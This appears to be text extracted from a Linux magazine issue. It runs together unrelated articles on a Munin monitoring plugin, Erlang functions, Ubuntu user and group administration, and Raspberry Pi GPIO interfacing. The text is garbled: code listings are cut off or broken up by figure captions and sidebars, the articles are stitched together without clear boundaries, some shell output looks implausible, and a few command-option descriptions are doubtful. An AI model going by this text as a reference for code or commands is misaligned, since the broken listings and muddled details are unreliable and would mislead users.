Linux manages virtual memory on a page granularly. There are some operations, however, which require physically contiguous pages to be allocated by the kernel. Such allocations may possibly fail if the memory gets fragmented, even when there are enough pages free, but they are not contiguous. /proc/buddyinfo helps to visualise free memory fragments on your Linux machine. The Munin buddyinfo plugin can track this info on all the nodes of your network and help you monitor it from the master. This plugin monitors the amount of contiguous areas, called higher order pages. The order means the exponent of two of the size of the area, so order 2 means 2^2 = 4 pages.

Munin has a generic interface for sending warnings and errors. If Munin discovers that a plugin has a data source breaching its defined limits, it can alert the administrator either through simple command-line invocations or through a monitoring system like Nagios or Icinga. Note that if the receiving system can cope with only a limited number of messages at a time, you can use the contact.max_messages directive.

graph_title Load average
graph_vlabel load
load.label load

This is to make sure that when munin-master gets data from the plugin, it knows how to plot the data in a graph. Here is the final plugin in one file.

#!/bin/sh
case $1 in
config) cat <<'EOM'
graph_title Load average
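Because the listing is split across the page, here is the plugin assembled in one piece, together with a quick way to exercise its config mode (the /tmp path is only for illustration; on a real node the plugin would live in the Munin plugins directory):

```shell
# Write the assembled load-average plugin to a scratch file
cat > /tmp/load_plugin <<'PLUGIN'
#!/bin/sh
case $1 in
config) cat <<'EOM'
graph_title Load average
graph_vlabel load
load.label load
EOM
exit 0;;
esac
printf "load.value "
cut -d' ' -f2 /proc/loadavg
PLUGIN
chmod +x /tmp/load_plugin

# Invoking it with "config" emits the graph configuration;
# invoking it with no arguments emits the field.value line
/tmp/load_plugin config
```

Running it without arguments simulates what munin-node does on a fetch.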

The plugins are run by munin-node, and invoked when contacted by the munin master


Munin proc plugin

The Munin proc plugin is used to monitor various aspects of named processes. You can configure it by supplying a pipe-delimited list of parameters through environment variables. env.procname defines the process name as seen inside the parentheses of the second column of /proc/<PID>/stat. If you don't get the data you expect, check that the value there matches what you expect. This is used for the first filter; the args/user filters are then applied on top of it. Note that <PID> is the process ID of the process that you are interested in. Process names including non-alphanumeric characters (like space, dash and so on) are Special Process Names. Also, note that if the process name (in env.procname) contains any characters other than [a-zA-Z_], they will be internally replaced by underscores.



Mihalis Tsoukalos

is a UNIX administrator, a programmer (UNIX & iOS), a DBA and a mathematician. He has been using Linux since 1993. You can reach him at @mactsouk (Twitter) and his website:

Resources
An installation of Erlang
A text editor such as Emacs or vi


Program in Erlang: Functions

Discover Erlang functions and basic Erlang data types as well as other interesting and helpful Erlang topics This tutorial is the second one in the series of tutorials about the Erlang programming language. The main subject of this tutorial is Erlang data types and functions. As you might remember from the tutorial in the previous issue, all Erlang code comes in modules unless you are experimenting in the Erlang shell; as a result, all Erlang code comes in functions. Erlang has a pretty unusual way of defining functions, especially if you are used to programming languages such as C or Python, which will be explained here. Additionally, as Erlang is a functional programming language, it also supports anonymous functions, which are also going to be illustrated. You will also learn about atoms, lists, maps and tuples, so start reading!

More About Erlang

Tutorial files available:


Concurrency is a central part of Erlang. As a result, Erlang processes, which should not be confused with Linux processes, are lightweight. Put simply, Erlang processes are easy to create, much easier than Linux processes, as they require a very small amount of time and have a small memory overhead. Erlang processes do not communicate with each other using memory, which is a risky thing, but by using messages. Furthermore, as processes are independent, the memory space of each process can be garbage-collected individually. Last, the failure of a process cannot do any damage to other processes, therefore allowing them to continue their jobs.

More About OTP

OTP is a central part of Erlang and the Erlang way of thinking because it allows you to make your Erlang applications highly available. This section will talk a little bit more about OTP in order to get a better understanding of it. OTP is unique among programming languages and allows teams to work and develop distributed, fault-tolerant, scalable and highly available systems. Despite its name (Open Telecom Platform), OTP is domain independent, which means that you can program applications for many different areas. OTP consists of three main parts. These are the Erlang language itself, various tools that come with Erlang, and the design rules, which are generic behaviours and abstract principles that allow you to focus on the logic of the system. The behaviours can be worker processes that do the dirty work, while supervisor processes monitor workers as well as other supervisors. In order to do this right, the developer should structure the processes appropriately. That is enough information about OTP for this tutorial; you will learn even more details about OTP in forthcoming tutorials.

Variables and Numbers

As expected, Erlang supports two kinds of numbers: integers and floats. When defining floats, you should always have a digit on the left of the decimal point, even if it is zero. If you forget to do so, you will get the following kind of error message:

11> MyFloat = .987.
* 1: syntax error before: ','

If the statement is correct, Erlang will reply by printing the float value:

11> MyFloat = 0.987.
0.987

Figure 1 shows an interaction with the Erlang shell where many variables are declared and used. You should pay special attention to the b() function that prints all defined variables, and the f() function that clears all the bound variables when executed without any parameters, or a specific variable when the variable is given as an argument.

Erlang data types

Erlang supports many data types including atoms, maps, lists and funs. An atom is used for representing a constant value. Atoms have a global scope and start with lowercase letters:

1> linux.
linux
2> 12.
12

As you can see, the value of an atom is the atom itself! Although it looks strange to discuss the value of an atom or an integer, the functional nature of Erlang requires that each expression has a value, which also applies to atoms and integers, despite the fact that they are simple expressions. A fun is a functional object that also allows you to create anonymous functions, which you can pass as arguments to other functions as if they were variables, without having to use

their names. Figure 2 shows a part of the Erlang reference about the fun keyword – a forthcoming tutorial will talk more about anonymous functions. A map is a compound data type that can contain a variable number of key-value pairs. Each pair is called an element – the total number of elements is called the size of the map. The following shell command shows how to create a map:

1> MYMAP = #{country=>greece, city=>athens, year=>2016, date=>{nov,18}}.
#{city => athens,country => greece,date => {nov,18},year => 2016}

As you can understand, there are many functions that allow you to manipulate maps – you can see some of them in action in Figure 3. A list is another compound data type with a variable number of elements. You can define a new list in the Erlang shell as follows:

1> LIST1 = [a, b, 3, {a,b}].
[a,b,3,{a,b}]

Please also bear in mind that behind the scenes Erlang treats strings as lists, so everything that works on a list can also be used on strings. A unique process ID identifies each Erlang process. A PID has the following form and its own data type, which means that you cannot use a process ID as if it were a string:

1> self(). <0.57.0>




Right The use of b() and f() functions as well as the declaration of numeric variables in Erlang

Figure 1

Figure 2

Across This is a small part of the Erlang reference about the fun keyword

Figure 3

The self() function returns the process ID of the calling process. Similarly, the spawn() function returns the process ID of the new process, which is used for sending messages to it:

1> c(hw).
{ok,hw}
2> spawn(hw, helloWorld, []).
Hello, world!
<0.65.0>

As you can see, spawn() takes three parameters: the name of the module the function belongs to, the name of the function, and the parameters of the function, which are passed as a list. If the function takes no parameters, you should pass an empty list. Figure 3 shows how to define and process maps and lists inside the Erlang shell.

As you can see, the first element of a tuple has an index number of 1. Similarly, the setelement() function allows you to change the value of an existing tuple item in order to create a new tuple:

Tuples and guards

Tuples are handy as they let you group data and are frequently used in Erlang as well as other programming languages.

A guard will allow you to specify the kind of data a given function will accept. Although it might just look a little fuzzy at the moment, you will see Erlang code that uses guards later on in this tutorial. The when keyword indicates a guard. The condition of a guard is relatively simple and will allow you to do pattern matching based on the content of the argument and not just on its shape. A tuple is a composite data type, which means that a tuple allows you to combine multiple items into a single data type and store them using a single variable. Most of the times Erlang tuples group two to five items. Moreover, the first atom of a tuple usually identifies the purpose or the category of the tuple. You can declare a tuple as follows:


2> T1 = {linux, 1}.
{linux,1}

The element() function allows you to access a given item of a tuple:

3> element(1, T1).
linux

6> T2 = setelement(1, T1, unix).
{unix,1}

Erlang functions

A function in Erlang is a sequence of function clauses that are separated by semicolons and terminated using a period/full stop (.). A function clause has the following form:

1> F=fun(X) -> 2*X end.
#Fun<erl_eval.6.52032458>

The previous code creates an anonymous function with one argument, bound to a variable named F. You can use it as follows:

Figure 4

Figure 5

Across How to define a map and a list in Erlang shell, including functions that help you deal with maps and lists Left The implementation of the process_tuple() function that illustrates how to process tuples

3> F(4).
8
4> F(4.5).
9.0

The number of arguments of a function is called the arity of the function. It is the combination of the module name (m), the function name (f) and the arity (N) that uniquely identifies a function as m:f/N. As you might remember, you have to export a function in order to be able to use it outside of the module that it belongs to. The next example shows how to pass functions as arguments to other functions! Type the following at the Erlang shell:

1> F=fun(X) -> 2*X end.
#Fun<erl_eval.6.52032458>
2> Five = fun(N, Function) -> 5 * Function(N) end.
#Fun<erl_eval.12.52032458>
3> Five(10,F).
100
4> F(10).
20

Here, you define two anonymous functions, bound to F and Five. The Five() function takes two arguments, an integer N and a function Function, and multiplies the numeric result of Function(N) by 5!

More about functions

Erlang supports much more complex functions than the ones you saw in the previous section. The following example will illustrate how to use a function to process a tuple. Please bear in mind that each tuple counts as a single function argument. A very common way to process tuples is by using pattern matching. Figure 4 shows the code of the process_tuple() function that processes tuples as found in tuples.erl. Executing tuples:main/0 generates the following output:

15> c(tuples).
{ok,tuples}
16> tuples:main().
Size: 6
First element: [1,2]
Size: 4
First element: a
ok

The last example will show a function that processes tuples

using guards and a case statement, which is a pretty common practice in Erlang. Figure 5 shows the relevant Erlang code as found in more_fun.erl. Using more_fun:check_temp/1 generates the following kind of output:

11> c(more_fun).
more_fun.erl:12: Warning: variable 'N' is unused
more_fun.erl:14: Warning: variable 'N' is unused
{ok,more_fun}
12> more_fun:check_temp({fahrenheit, 50}).
'Do not know about Fahrenheit!'
13> more_fun:check_temp({kelvin, 50}).
'Cannot tell about Kelvin!'
14> more_fun:check_temp({celsius, 50}).
'Way too hot!'
15> more_fun:check_temp({celsius, 10}).
'It is getting cold...'

As you can see, not all case statements must have a guard.

More information about the Erlang shell

The q() function is the easiest way to exit the Erlang shell, but keep in mind that the q() function quits everything Erlang is doing. If you are working locally then there is no problem, but if you are working on a remote system you’d better quit by typing Ctrl+G and then Q. The reason is that you may shut down the Erlang runtime on the remote machine when quitting using q()! The built-in line editor of erl is a subset of Emacs. In Figure 6 you will see some more advanced commands of the Erlang shell including the declaration of a function, the use of the h() function to print the history list, and two alternative ways to exit the Erlang shell, the init:stop() function as well as the halt() function.

Getting user input

Although Erlang is primarily used for server applications, it can also allow you to interact with users. This section will teach you how to get user input from Erlang, which is pretty handy when you are developing small interactive programs or other command line utilities. Although it is relatively easy to get user input from the Erlang shell, the tricky part is verifying that the input is valid in order to avoid exceptions:




Right How to define a function inside the Erlang shell and the init:stop() and halt() functions that help you exit it

Figure 6

Figure 7

Across The code of userInput.erl illustrates one way of getting user input

As you will see, Erlang is not particularly good at dealing with strings. Additionally, it is the job of the developer to check that the input is in the right form and of the desired data type, because improper data might create trouble when you attempt to process it. There are other ways to get user input, including reading characters and reading entire lines of text; you will learn more about this in the Erlang tutorial in the next issue.

1> {ok, [VAR]} = io:fread("input : ", "~d").
input : 123
{ok,"{"}
2> VAR.
123
3> {ok, [OTHER]} = io:fread("input : ", "~d").
input : abc
** exception error: no match of right hand side value {error,{fread,integer}}

Figure 7 shows sample Erlang code that teaches you how to get user input and make sure that you get what you want, which you might find more complicated than expected, especially if you are familiar with other programming languages. Executing userInput.erl generates the following kind of output:

1> c(userInput).
{ok,userInput}
Please give {Name, Surname} >> asd, asd.
There is an error somewhere.
Please give {Name, Surname} >> {'Mihalis', 'Tsoukalos'}.
Hello 'Mihalis' 'Tsoukalos'!
Please give {Name, Surname} >> 12.
A tuple is needed!
Please give {Name, Surname} >> quit.
Bye!
ok

As you can imagine, the key role is played by the function that checks the return value of the io:read() function, which is a tuple. Additionally, the user needs to end each input with a dot.


Creating Erlang scripts

The escript binary allows you to create Erlang scripts – an attractive capability familiar from most scripting languages. The following Erlang script accepts one command line argument and asks the user for their name, using a simplified version of the code found in userInput.erl:

#!/usr/bin/env escript
%% -*- erlang -*-
main([String]) ->
    try
        N = list_to_integer(String),
        I = io:read("Please give {Name} >> "),

Filesystems and the Erlang shell
There will be times when you would like to move to another directory while you are working in the Erlang shell. Look at the following interaction with the Erlang shell:

1> pwd().
/home/mtsouk
ok
2> cd("..").
/home
ok
3> pwd().
/home
ok

So, the cd() function allows you to change the current directory, whereas pwd() prints the current working directory.

        process_input(I),
        io:format(": ~w ~n", [N])

Figure 8

    catch
        _:_ -> usage()
    end;
main(_) -> usage().

Left The use of the fibo() function found in fibo1.erl

usage() ->
    io:format("usage: scriptName integer\n"),
    halt(1).

process_input({ok, Data}) when is_tuple(Data) ->
    Name = element(1, Data),
    io:format("~w", [Name]);
process_input({error, _}) ->
    io:format("There is an error somewhere.~n").

After creating the script file, you should change its permissions:

$ chmod 755 aFile.erl
$ ls -l aFile.erl
-rwxr-xr-x 1 mtsouk staff 0 Nov 14 15:30 aFile.erl

Next, you can execute aFile.erl as if it was a regular shell script:

$ ./aFile.erl 123
Please give {Name} >> {'Mihalis'}.
'Mihalis': 123

Calculating Fibonacci numbers
We will now learn how to calculate Fibonacci numbers in a different way than the one you saw in the previous issue of Linux User & Developer. The code of the fibo() function, which can be found in fibo1.erl, is the following:

fibo(N) when N > 0 -> fibVar(N, 0, 1).

fibVar(0, F1, _F2) -> F1;
fibVar(N, F1, F2) -> fibVar(N - 1, F2, F1 + F2).

You can see its performance using the time(1) command in Figure 8. The implementation of fibo() in fibo1.erl uses another function, named fibVar(), that takes three arguments instead of just one. However, as fibVar() is only used internally, it does not need to be in the export list of the module. The only function in the export list is main/1.
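The accumulator trick used by fibVar/3 translates directly into an iterative loop; for comparison, here is the same idea sketched in shell (an illustration only, not part of the Erlang code):

```shell
# fib(n) via two accumulators, mirroring fibVar(N, F1, F2):
# each step does (F1, F2) -> (F2, F1 + F2) and counts N down
fib() {
  n=$1; f1=0; f2=1
  while [ "$n" -gt 0 ]; do
    tmp=$((f1 + f2)); f1=$f2; f2=$tmp
    n=$((n - 1))
  done
  echo "$f1"
}
fib 10   # prints 55
```

Because no call stack grows, this runs in constant space, which is exactly why the tail-recursive Erlang version outperforms the naive doubly-recursive one.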

Figure 9

As you can see, you just have to embed your Erlang code into a text file in a specific way and read the command line arguments as a list, converting them to integers with the list_to_integer() function where needed. This is a very neat way of creating small Erlang programs that do specific but relatively small tasks. The next tutorial will talk about many interesting things including formatting output, lists, maps, records and message passing between Erlang processes. Until then, write as much Erlang code as you can!

Left The use of the fibo() function found in fibo2.erl as well as its entire Erlang code

Infinite loops
The following Erlang code, when called with a negative integer as an argument, generates a call that keeps running and never ends:

fibo(0) -> 0;
fibo(1) -> 1;
fibo(N) -> fibo(N - 1) + fibo(N - 2).

In other words, you should be very careful when defining the arguments that a function can accept, and put guards where necessary in order to avoid such bugs. A more appropriate and secure definition of fibo() would be the following:

fibo(N) when N > 0 -> fibVar(N).

fibVar(0) -> 0;
fibVar(1) -> 1;
fibVar(N) -> fibVar(N - 1) + fibVar(N - 2).

More about Fibonacci numbers
Although the Erlang code of fibo1.erl is different from the code you saw in the previous issue, there is another way to calculate Fibonacci numbers in Erlang, which is presented in fibo2.erl. The implementation of the fibo() function, which uses a list, as well as its performance, can be seen in Figure 9. Just remember to compile the code first using erlc, which is the Erlang compiler. As you can see, not all Fibonacci implementations are equal!



User accounts

Manage user accounts in Ubuntu
Learn how to effectively manage user accounts, permissions, groups and more

Swayam Prakasha

has a master’s degree in computer engineering. He has been working in information technology for several years, concentrating on areas such as operating systems, networking, network security, electronic commerce, internet services, LDAP and web servers. Swayam has authored a number of articles for trade publications, and he presents his own papers at industry conferences. He can be reached at swayam.prakasha@


Unix / Linux Administration

The Beginner’s Guide to Managing Users and Groups on Linux

Managing Linux User Account Security

Managing Ubuntu Linux Users and Groups

Figure 1 Details of the useradd command


As you might expect, adding and managing users is the most common task of any Linux system administrator. User accounts help in keeping boundaries between the people who use the system and the processes that run on the system. Groups are a means of assigning rights to your system. As expected, each user needs to have a separate user account. Having a user account provides an area in which you can securely store files. One way to add user accounts is through the User Manager window. The other, very straightforward method for creating a new user from the shell is to use the useradd command. After opening a Terminal window, you just need to invoke useradd at the command prompt. But, please note that for this, you need to have root permissions. The useradd command has one required field – the login name of the user – but you can also include some additional information using various options. The following table describes some of the popularly used options of the useradd command.

Option           Description
-c "comments"    Provide a description of the user account
-d home_dir      Set the home directory to use for the specific account
-e expiry_date   Assign the expiration date for the user account
-p passwd        Enter a password for the account that you are adding
-f               Set the number of days after which the password expires
-s shell         Specify the command shell to use for this account

Please note here that we have started with sudo as useradd needs root privileges. We are trying to create an account for a new user, in this case, the author. Once the user is created, the next step is to set up the initial password. This can be done using the passwd command as shown below (the example includes the author’s username; this would be replaced by the username of the user you will be adding).

~$ sudo passwd swayam

A successful execution of the above command prompts the user to type the password twice. The useradd command determines the default values for new accounts by reading the /etc/login.defs and /etc/default/useradd files. You can modify these default values by editing the files manually with any text editor. It needs to be noted here that login.defs differs between Linux systems. Some of the parameters that can be configured in the /etc/login.defs file are given here.

PASS_MAX_DAYS
PASS_MIN_DAYS
PASS_MIN_LEN
PASS_WARN_AGE

Please note that all uncommented lines in the /etc/login.defs file contain a keyword/value pair. As an example, the keyword PASS_MIN_LEN is followed by some white space and the value 5. This tells the useradd command that the user password must be at least five characters long. You can refer to the /etc/default/useradd file in order to view the other default settings. You can also see the default settings by using the useradd command with the -D option.

Let’s look at the useradd command with an example.

~$ sudo useradd -c “Swayam Prakasha” swayam

You can also use the -D option to change the default settings. In order to do this, give the -D option first and then add the defaults you want to set. For example, to set the default home directory base to /home/swayam, you can use the following command.

~$ useradd -D -b /home/swayam

In addition to setting up user defaults, an administrator can also create default files that are copied to each user's home directory for use. These files typically include login scripts and the shell configuration files. Let's take a look at another useful command – usermod – that can be used to modify the settings for an existing account. This command provides a straightforward method for changing the account parameters.

Above A look at the default settings

Many of the options available with the usermod command mirror those found in the useradd command. The popular options that you can use with usermod are:
• -c "comments" - Change the description associated with the user account.
• -d home_dir - Change the home directory to use for a specific account.
• -e expire_date - Assign a new expiration date for the account.
• -l login_name - Change the login name of the user account.
• -s shell - Specify a different command shell to use for this account.

Now let's take a quick look at some examples for the usermod command.

~$ usermod -s /bin/csh [username]

This changes the shell to csh for the named user.

~$ usermod -aG accounting [username]

The -aG combination makes sure that the supplementary group is added to any existing groups for the specific user. Another command that will come in very handy in user account management is userdel. This command can be used to remove users.

~$ userdel -r [username]

When the above command is executed, the user is first removed from the /etc/passwd file. Since we have used the -r option, it removes the user's home directory as well. We need to keep in mind here that simply removing the user account does not change anything about the files that the user leaves around the system (except in cases where we use the -r option).

Now it is time to understand more about group accounts on Ubuntu systems. The concept of group accounts will come into the picture if we need to share a set of files with multiple users. You can create a group and change the set of files to be associated with that group. Please note that the root user can assign users to a group so that they can have access to files based on the group's permissions. Every user is assigned to a primary group. By default, that group is a new group with the same name as the user. You can easily identify the primary group by the number in the fourth field of each entry in the /etc/passwd file. Linux typically stores the list of all groups in a file called /etc/group. You can run a command in the Terminal to view as well as to edit the groups in the system:

~$ sudo vigr

Let's look at how to create group accounts. As a root user, you will be able to create new groups by using the command groupadd at the command line. Also, note that groups are created automatically when a user account is created. Let's take a look at a couple of examples:

~$ groupadd mars

Here, a group named mars is created with the next available group ID.

~$ groupadd -g 14235 venus

A group named venus is created with a group ID of 14235.
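To see a primary group ID in practice, you can pull the GID field straight out of /etc/passwd. The example below uses root, whose GID is 0 on virtually every Linux system:

```shell
# Print the primary group ID (the GID field of /etc/passwd) for a given user.
# Fields are colon-separated: name:password:UID:GID:comment:home:shell
awk -F: '$1 == "root" { print $4 }' /etc/passwd
```

Swap "root" for any username to check that user's primary group.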

Disable root login When you have your own account set up, it is good practice for you to go and disable SSH remote login for root. This can be done by modifying the contents of the configuration file /etc/ssh/sshd_config. Look specifically for PermitRootLogin and set it to no.
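A sketch of that edit, demonstrated on a throwaway copy rather than the live file (on a real system you would edit /etc/ssh/sshd_config itself and then reload sshd):

```shell
# Demonstrate flipping PermitRootLogin to "no" on a demo copy of the file
demo=/tmp/sshd_config.demo
printf '%s\n' 'Port 22' 'PermitRootLogin yes' > "$demo"

# Rewrite the PermitRootLogin line; written portably (no sed -i)
sed 's/^PermitRootLogin.*/PermitRootLogin no/' "$demo" > "$demo.new" && mv "$demo.new" "$demo"

grep '^PermitRootLogin' "$demo"
```

After changing the real file, restart or reload the SSH service so the new setting takes effect.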



User accounts

If you are interested in changing a group at a later point in time, you can use the groupmod command.

~$ groupmod -g 300 mars

The group ID of mars is changed to 300.

~$ groupmod -n stars venus

The group venus is renamed to stars. Let's turn our attention to Access Control Lists (ACLs). With the help of ACLs, one user can allow others to read, write and execute files and directories without requiring the root user to change the user or group that's assigned to them. There are a few important things to know about ACLs:
• ACLs need to be enabled on a file system when that file system is mounted
• To add ACLs to a file, you use the setfacl command
• To view ACLs set on a file, use the getfacl command
• To set the ACLs on any file or directory, you need to be the actual owner assigned to it

Let's take a detailed look at the setfacl command. The system administrator can use this command to modify the permissions (by using the -m option) or to remove the ACL permissions (by using the -x option).

Below A look at users and groups

~$ setfacl -m u:[username]:rwx file_name

In this command, first we used the modify (-m) option followed by the letter u – this indicates that we are setting the ACL permission for a specific user. Then we have specified the username after the colon. After another colon, we have the permissions that we want to assign. We can assign read (r), write (w) and/or execute (x) permissions to the user or the group.

Another important aspect that we need to understand with reference to ACLs is the set-up of default ACLs. Setting up default ACLs on a directory enables your ACLs to be inherited. In other words, when we create new files and directories in that directory, they are assigned the same ACLs. In order to set a user or group ACL permission as default, you just need to add ‘d:’ to the user or group designation. You can make sure that the default ACL works by creating a subdirectory and running the getfacl command. After that, you will see that default lines are added for the user, group and so on, which are inherited from the directory’s ACL.

Next, let’s look at how we can enable ACLs. Basic Linux file systems that we create after installation have only one user and group assigned to each file and directory and thus do not include ACL support by default. In order to add ACL support, we need to add the acl mount option when we mount the file system. This can be done in multiple ways. You can add the acl option to the fourth field of the relevant line in the /etc/fstab file, which automatically mounts the file system when the system boots up, or you can add the acl option on the mount command line when you mount the file system manually using the mount command.

/dev/sdc1    /var/extra_stuff    ext4    acl    1


Here, we are trying to mount the ext4 file system located on the /dev/sdc1 device to the /var/extra_stuff directory. Note that instead of the default entry in the fourth field, we have added acl. If there were already other options set in that field, we need to add a comma after the last option and then add acl. With this acl field, the next time the file system is mounted, ACLs are enabled. For the second option, add ACL support by mounting the file system by hand and using the acl option with mount. This can be done using a command similar to this:

~$ mount -o acl /dev/sdc1 /var/extra_stuff

It is important to note here that the mount command only mounts a file system temporarily. When the system boots, the file system is not mounted again. Thus it is necessary to have an entry in the /etc/fstab file. Let’s take a look at how to add directories for users so that they can collaborate among themselves. When we talk about permissions, we know that there are read, write and execute bits for users, groups and others. In addition to these bits, there are special file permission bits that can be set by using the chmod command. The bits that you need to use for creating collaborative directories are the set group ID bit and the sticky bit. There are specific numeric values associated with these bits:


Name               Numeric value
Set user ID bit    4
Set group ID bit   2
Sticky bit         1
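Adding the set group ID (2) and sticky (1) values gives a leading 3, so a collaborative directory with rwxrwx--- permissions gets mode 3770. A sketch using a scratch directory (the /tmp path is only for illustration):

```shell
# Create a shared directory and apply set-GID (2) + sticky (1) on top of 770
dir=/tmp/shared_demo
mkdir -p "$dir"
chmod 3770 "$dir"

# The permission string shows 's' for set-GID and 'T' for the sticky bit
ls -ld "$dir" | cut -c1-10   # drwxrws--T
```

With set-GID on the directory, new files inherit the directory's group; the sticky bit stops users deleting each other's files.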

Above Details of the setfacl command

Implement password policies
Whenever we have more remote users, it is always important to implement and enforce reasonable password policies. This can be done by using a Linux PAM module; with it, you can prevent weak password usage.

You can use the set group ID bit for creating the group’s collaborative directories. The set UID (user ID) and set GID (group ID) bits are typically used on special executable files that allow commands to be run differently. In a normal situation, when a user runs a command, that command runs with that user’s permissions. For example, if we run the cat command as the user Jo, that instance of the cat command would have the permissions to read and write files that the user Jo could read and write. Commands with the set UID or set GID bits set are different. It is the owner and the group assigned to the command that determine the permissions the command has to access the resources on the machine. For example, a set UID command owned by root will run with root permissions.

The default way of authenticating users is to check the user information against the contents of the /etc/passwd file and the passwords from the /etc/shadow file. But there are other methods. It’s common practice in large enterprises to store the user account information in a centralised authentication server. The advantage with this setup is that when we install a new Linux system, we do not need to add user accounts to that system. Instead, we can have the Linux system query the authentication server when someone tries to log in. For authenticating users with a centralised auth server, we need to provide the account information, including username, user/group IDs, default shell etc, and the authentication method.

A restricted deletion directory is created by turning on a directory’s sticky bit. In a normal situation, if write permission is open to a user on a file or a directory, then that user can delete that file or the directory. But when it comes to a restricted deletion directory, unless you are the root user or the owner of the directory, you will not be able to delete another user’s files.
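As a quick sketch of the special bits in action, using a throwaway directory (the mode values come from the table above; in a real collaborative directory you would also chgrp it to the shared group):

```shell
dir=$(mktemp -d)
# 2 (set group ID) + 770: new files created here inherit the directory's group
chmod 2770 "$dir"
stat -c '%a' "$dir"    # prints 2770
# 1 (sticky) + 777: world-writable restricted deletion directory, like /tmp
chmod 1777 "$dir"
stat -c '%a' "$dir"    # prints 1777
rmdir "$dir"
```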



Raspberry Pi

“Go beyond using off-the-shelf interfaces like HATs, or even building circuits that others have designed, by designing your own electronic circuits”

Contents
» Raspberry Pi air drum kit
» Make an egg-drop game with the Sense HAT
» Make a Pi-based warrant canary
» A Raspberry Pi photo frame
» Secrets of Pi interfacing
Learn how to design simple electronic circuits to interface your Raspberry Pi to real-world devices

Using a single-board computer such as a Raspberry Pi to interface with and control real-world devices requires two quite different skills. First, you need to be able to churn out code, and second, you need to be able to interface the Pi to external devices. Here we look at the second of those areas and, in particular, investigate how to go beyond using off-the-shelf interfaces like HATs, or even building circuits that others have designed, by designing your own electronic circuits. Using this hands-on guide and its circuit diagrams, you’ll soon be able to connect switches, LEDs and much more. Here we’ll present circuit diagrams, but if you’re not familiar with them, see our earlier guide (Linux User & Developer 169), which explained how to turn a circuit diagram into a working circuit. Our main emphasis is interfacing to the Raspberry Pi, but most of this can also be applied to other small computers such as the Arduino, which are also popular for control applications.

UNDERSTAND THE PI’S GPIO HARDWARE Discover the Pi’s GPIO hardware – its gateway to the real world Even if you’ve never connected external devices to your Raspberry Pi, you can’t fail to have noticed the double row of 40 pins at the edge of the board (26 pins on the early Pis). This is the GPIO header, otherwise known as the general-purpose input/ output connector, and it provides a means of interfacing to real-world devices. Before starting to think about designing circuits to interface to the Pi, therefore, it’s important to understand the basics of the GPIO hardware.


Although referred to as the GPIO header, not all the pins connect to the GPIO hardware. Some of the other pins provide power and ground connections that are also used by hardware that’s connected to the header. The Pi’s GPIO header has eight ground pins (GND), which you can identify from the documentation. Ground is equivalent to the negative side of the power supply and is often referred to as 0V (ie zero volts). The GPIO header also has four power supply pins: two that provide +3.3V and two that provide +5V. Using the ground and power supply pins allows you to obtain power from the Pi for your external interface circuitry so you don’t need a separate power supply.

GPIO pin numbering

There are two numbering schemes for GPIO pins. First there’s the physical numbering. This reflects each pin’s position on the header, so it runs from 1 and 2 at one end to 39 and 40 at the other. Then, for the actual GPIO pins (as opposed to power supplies), there are GPIO numbers. You can choose to use either scheme in the software.


The Raspberry Pi’s GPIO operates from a supply of 3.3V, so you shouldn’t present a higher voltage to any of the pins. Doing so will probably destroy the Pi. However, there are ways of interfacing to devices that require higher voltages, as we’ll see later in the ‘Exceed limits safely’ section (on page 66). In fact, there are even ways of interfacing to mains-powered equipment and this is also something we’ll discuss. The maximum voltage isn’t the only way of exceeding the GPIO’s maximum rating; you should also adhere to its maximum current of 16mA (and a total of 50mA for all GPIO pins). In practice, this means that you’ll easily be able to drive an LED, which doesn’t require much current, but driving a higher-powered device such as an electric motor requires a bit more attention. Again, this is covered in the ‘Exceed limits safely’ section.


With two exceptions, the remainder of the pins on the GPIO header are GPIO pins although some also have secondary functions that we’re not going to get embroiled in here. As the phrase ‘general-purpose input/ output’ suggests, these pins can be configured in the software to act either as inputs or outputs. When programmed as inputs, these pins could be connected to a switch, for example, and the software would be able to read whether the switch was open or closed, i.e. on or off. Alternatively, when programmed as outputs, these pins could be connected to an LED, and the software would be able to turn it on or off.



Secrets of Pi interfacing


Interfacing a switch or an LED to the GPIO header really couldn’t be simpler


Wire in the switch

The first job in interfacing a switch to the Pi is to connect one of the switch’s two terminals to a GPIO pin (which will be configured as an input in the software) and connect the other of its terminals to 0V (GND). Having done this, the GPIO pin will be connected to 0V, a condition that the software will see as a logic 0, whenever the switch is closed, ie held down in the case of a push button or in its ‘on’ state with a mechanically latching toggle switch.


Add a pull-up resistor

Although a GPIO pin wired to a switch and 0V will be at logic 0 when the switch is closed, it will be ‘floating’ when it’s open. In other words, it wouldn’t be certain whether it would be seen as a 0 or a 1. To overcome this, it must be wired to +3.3V via a resistor, which is referred to as a pull-up resistor. Now the GPIO pin will be logic 1 when the switch is open. The resistor value isn’t critical, but 10k is a good choice.

Use built-in pull-ups

If you’re wiring the switch to some other types of single-board computer or to the Pi’s GPIO via some logic circuitry, an external pull-up resistor is the only solution. However, if you’re interfacing directly to a GPIO pin, you can, as an option, enable an internal pull-up resistor in the Pi’s circuitry. The bit of code reproduced here shows how this is done using the RPi.GPIO Python library. The circuit diagrams in the remaining steps assume an external pull-up but, if you’re using an internal pull-up, just omit the 10k resistor.


GPIO.setup(2, GPIO.IN, pull_up_down=GPIO.PUD_UP)  # set GPIO 2 as input with pull-up


Limit the current

Because GPIO pins are bidirectional, there’s a potential problem if a pin that’s attached to a switch is accidentally configured as an output and set to a logic 1. This will put 3.3V on the pin which, if the switch is then closed, would be connected directly to 0V. This would cause a high current to flow and, potentially, damage the Pi. Putting a resistor in series with the switch will prevent this, and 1k is the recommended value. The series resistor is also integral to the circuit in the next step, so don’t omit it if you want to add de-bounce circuitry.

De-bounce the switch

When a switch is operated, the contacts often open and close several times very quickly for a short time. This is called bounce, and it might cause problems. Perhaps pressing a push button is supposed to turn an LED on or off. Now, if the LED is off and you press and release the push button but it switches closed-open-closed-open instead of closed-open, the LED will switch on and off again very quickly, and it would appear that nothing has happened. This is remedied by adding a capacitor as shown – a value of 100n is typical if you’re using a 1k current-limiting resistor. Alternatively, software de-bounce can be selected in the RPi.GPIO library.
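The software approach can be sketched in plain Python: a hypothetical filter (ours, not part of any library) that drops state changes arriving too soon after the previously accepted one. In RPi.GPIO itself this is what the `bouncetime` argument of `add_event_detect` does.

```python
def debounce(events, bounce_s=0.05):
    """Filter (time, state) contact events, keeping a state change only
    if it happens at least bounce_s after the last accepted change."""
    accepted = []
    for t, state in events:
        if not accepted:
            accepted.append((t, state))
        elif state != accepted[-1][1] and t - accepted[-1][0] >= bounce_s:
            accepted.append((t, state))
    return accepted

# A press that bounces closed-open-closed before settling, then a release:
raw = [(0.000, "closed"), (0.001, "open"), (0.002, "closed"), (0.500, "open")]
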